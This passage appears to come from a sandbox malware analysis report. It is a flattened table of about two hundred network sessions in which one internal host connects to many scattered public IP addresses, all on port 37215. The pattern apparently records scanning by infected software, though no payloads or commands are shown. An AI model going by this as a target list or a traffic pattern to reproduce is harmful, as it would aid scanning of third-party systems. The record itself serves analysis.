                                                          3857192.168.2.1532774197.205.110.5637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3858192.168.2.1557524197.231.79.25137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3859192.168.2.1551998157.5.234.19037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3860192.168.2.1559634143.158.60.22337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3861192.168.2.1539108197.112.67.5837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3862192.168.2.1548148141.107.237.10637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3863192.168.2.155263241.50.156.2437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3864192.168.2.155442841.28.21.9237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3865192.168.2.154475241.251.191.13037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3866192.168.2.1557066118.230.121.14937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3867192.168.2.1533836169.216.105.18337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3868192.168.2.155931241.193.20.13837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3869192.168.2.1542880157.144.219.23137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3870192.168.2.1540536197.89.207.18337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3871192.168.2.1539130197.218.70.8237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3872192.168.2.154245641.151.108.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3873192.168.2.155515841.196.125.25037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3874192.168.2.154654441.149.140.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3875192.168.2.1533218182.155.77.13437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3876192.168.2.1536398197.122.237.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3877192.168.2.1540670157.146.116.9837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3878192.168.2.155014241.120.211.20537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3879192.168.2.1557750197.71.183.2837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3880192.168.2.155331041.161.10.137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3881192.168.2.15572024.74.114.20537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3882192.168.2.153937841.48.5.337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3883192.168.2.1539792157.129.56.18637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3884192.168.2.1554850197.233.65.9037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3885192.168.2.1558272157.4.59.21837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3886192.168.2.1558996197.144.246.4237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3887192.168.2.1559382157.75.104.6837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3888192.168.2.155556288.190.191.5737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3889192.168.2.1544536189.67.21.22137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3890192.168.2.1554182197.96.167.1837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3891192.168.2.1556608197.46.123.5437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3892192.168.2.1545554197.0.126.5937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3893192.168.2.1539622157.2.76.17237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3894192.168.2.153964241.103.0.1337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3895192.168.2.155196041.235.217.9737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3896192.168.2.154540041.195.40.14537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3897192.168.2.1560536157.61.124.12637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3898192.168.2.1560394197.164.204.16437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3899192.168.2.153827657.38.180.14837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3900192.168.2.1559992197.121.153.4837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3901192.168.2.1544204157.5.147.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3902192.168.2.1534328157.6.24.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3903192.168.2.154633632.248.109.10437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3904192.168.2.1552690164.164.28.1437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3905192.168.2.153622665.202.27.14837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3906192.168.2.1544448197.96.55.21337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3907192.168.2.154633041.110.203.8237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3908192.168.2.155062441.86.30.3237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3909192.168.2.1540140197.252.15.7237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3910192.168.2.1551594157.219.41.14937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3911192.168.2.1544064113.222.76.21837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3912192.168.2.155077694.103.246.2937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3913192.168.2.153739641.164.135.5337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3914192.168.2.1549650197.17.231.23737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3915192.168.2.1546018197.175.68.4237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3916192.168.2.1560990197.166.15.25037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3917192.168.2.1539228157.206.243.24937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3918192.168.2.1552878157.203.166.12437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3919192.168.2.154761045.248.11.13737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3920192.168.2.1539236206.9.33.5537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3921192.168.2.1549264157.210.67.137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3922192.168.2.154855441.223.87.9637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3923192.168.2.1541246157.131.83.3537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3924192.168.2.1535218157.14.177.22937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3925192.168.2.1560542197.76.193.12437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3926192.168.2.1557494177.117.151.20437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3927192.168.2.1534464157.204.146.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3928192.168.2.1553684197.6.85.20137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3929192.168.2.154528041.96.225.22437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3930192.168.2.1553246197.152.201.7037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3931192.168.2.1551816157.44.32.21637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3932192.168.2.1543676197.225.140.19337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3933192.168.2.1546306197.180.74.18137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3934192.168.2.153909641.127.242.23637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3935192.168.2.1554956142.125.122.24937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3936192.168.2.1554422157.139.229.1837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3937192.168.2.1547972174.155.200.7637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3938192.168.2.1547458157.121.167.2837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3939192.168.2.156031241.154.102.8537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3940192.168.2.156072641.156.111.21737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3941192.168.2.1550340157.95.206.6237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3942192.168.2.1551450180.37.62.6737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3943192.168.2.1541496197.1.229.10437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3944192.168.2.1543944157.62.175.4537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3945192.168.2.1537050120.65.235.4337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3946192.168.2.1542188157.65.94.9737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3947192.168.2.1539978157.109.32.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3948192.168.2.154018441.75.157.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3949192.168.2.155554032.251.87.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3950192.168.2.1556090157.10.54.18237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3951192.168.2.1558998157.207.254.11537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3952192.168.2.1546060197.194.241.9537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3953192.168.2.154681297.70.32.11437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3954192.168.2.1553190197.220.233.8037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3955192.168.2.155554441.106.67.20137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3956192.168.2.154140841.191.48.15737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3957192.168.2.1554008157.209.188.18137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3958192.168.2.1551534197.179.227.2937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3959192.168.2.1553742197.176.96.17937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3960192.168.2.154248241.95.172.11737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3961192.168.2.1549148205.212.110.5137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3962192.168.2.1540296157.230.102.5437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3963192.168.2.153543041.194.8.20137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3964192.168.2.1539238157.78.4.2337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3965192.168.2.1552772197.87.218.19537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3966192.168.2.1536904197.136.189.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3967192.168.2.1552772136.239.63.23537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3968192.168.2.154089641.78.85.20837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3969192.168.2.1539336157.233.75.14837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3970192.168.2.1547720157.159.57.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3971192.168.2.154117841.54.24.13737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3972192.168.2.1554976104.187.160.8737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3973192.168.2.1533200157.250.64.19137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3974192.168.2.1559112197.246.210.17037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3975192.168.2.1555256201.95.129.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3976192.168.2.154223641.3.82.8237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3977192.168.2.155680641.127.141.12037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3978192.168.2.1550624157.164.205.7837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3979192.168.2.154399259.24.253.1337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3980192.168.2.1546688197.68.123.737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3981192.168.2.1534416197.192.90.9337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3982192.168.2.1535354197.196.231.137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3983192.168.2.1541890157.247.240.18637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3984192.168.2.1552908157.151.77.3237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3985192.168.2.1551002157.208.169.24837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3986192.168.2.1552964157.171.181.5737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3987192.168.2.155924641.13.163.7637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3988192.168.2.1548672197.211.173.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3989192.168.2.155389441.85.183.3237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3990192.168.2.1549344147.238.118.7237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3991192.168.2.1544390197.218.80.20237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3992192.168.2.1544326197.155.26.337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3993192.168.2.1554976105.248.173.2437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3994192.168.2.1551586157.50.221.16537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3995192.168.2.1541316197.173.169.5737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3996192.168.2.155226251.35.59.20637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3997192.168.2.1557194157.104.195.7837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3998192.168.2.1556236197.92.80.25537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          3999192.168.2.1545056157.114.160.16637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4000192.168.2.1557378157.231.91.15837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4001192.168.2.1545966157.100.148.24037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4002192.168.2.1539208197.13.252.21637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4003192.168.2.1558578157.96.110.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4004192.168.2.1554396157.55.150.6937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4005192.168.2.154774841.224.41.3437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4006192.168.2.154797041.48.102.17037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4007192.168.2.154735841.137.208.18437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4008192.168.2.153309641.252.124.23937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4009192.168.2.1545926197.207.251.137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4010192.168.2.1552008197.196.167.12637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4011192.168.2.154798041.130.84.21737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4012192.168.2.154588641.90.220.15937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4013192.168.2.155202641.100.140.21337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4014192.168.2.153950241.74.105.11237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4015192.168.2.1538638157.188.159.9737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4016192.168.2.1540524197.174.109.7137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4017192.168.2.1537266161.106.143.13337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4018192.168.2.153927818.192.55.14337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4019192.168.2.1532984197.202.98.2137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4020192.168.2.1551746200.11.13.20137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4021192.168.2.1537832197.108.12.14237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4022192.168.2.1550110199.152.98.14437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4023192.168.2.154950441.120.85.14137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4024192.168.2.1546090197.73.231.16837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4025192.168.2.153788680.194.229.14837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4026192.168.2.1550994157.106.219.22237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4027192.168.2.154931441.221.62.12937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4028192.168.2.15438865.5.184.4437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4029192.168.2.1534822157.204.234.2837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4030192.168.2.1553958157.212.68.637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4031192.168.2.155390417.80.215.19637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4032192.168.2.1558358197.69.130.24937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4033192.168.2.154519841.156.47.22837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4034192.168.2.1547916197.183.28.11837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4035192.168.2.155503841.209.235.3537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4036192.168.2.1533736197.96.116.8637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4037192.168.2.1554856197.152.62.337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4038192.168.2.1559412157.19.155.25237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4039192.168.2.1534156157.1.186.837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4040192.168.2.154506641.35.237.14437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4041192.168.2.155959241.85.169.20737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4042192.168.2.1555010105.16.62.2037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4043192.168.2.1557636157.236.254.19537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4044192.168.2.1549806197.254.163.7937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4045192.168.2.1539754197.141.0.5037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4046192.168.2.153826241.221.145.17737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4047192.168.2.1545510157.247.81.19437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4048192.168.2.1543452197.62.213.8037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4049192.168.2.1547284197.213.241.5637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4050192.168.2.1543738197.65.124.3337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4051192.168.2.1542574197.103.45.16537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4052192.168.2.1543562197.97.232.2537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4053192.168.2.155636471.140.16.8237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4054192.168.2.1534166157.21.97.6737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4055192.168.2.1547386197.152.20.20937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4056192.168.2.1535078197.249.254.25537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4057192.168.2.1558772142.20.237.24237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4058192.168.2.1550010157.33.239.13137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4059192.168.2.1547720197.56.118.17937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4060192.168.2.1554814167.152.168.637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4061192.168.2.154439441.184.136.2337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4062192.168.2.1550580197.125.78.1137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4063192.168.2.1556056157.14.69.23137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4064192.168.2.155410041.127.201.5437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4065192.168.2.154876638.51.115.17537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4066192.168.2.156097641.179.238.2937215
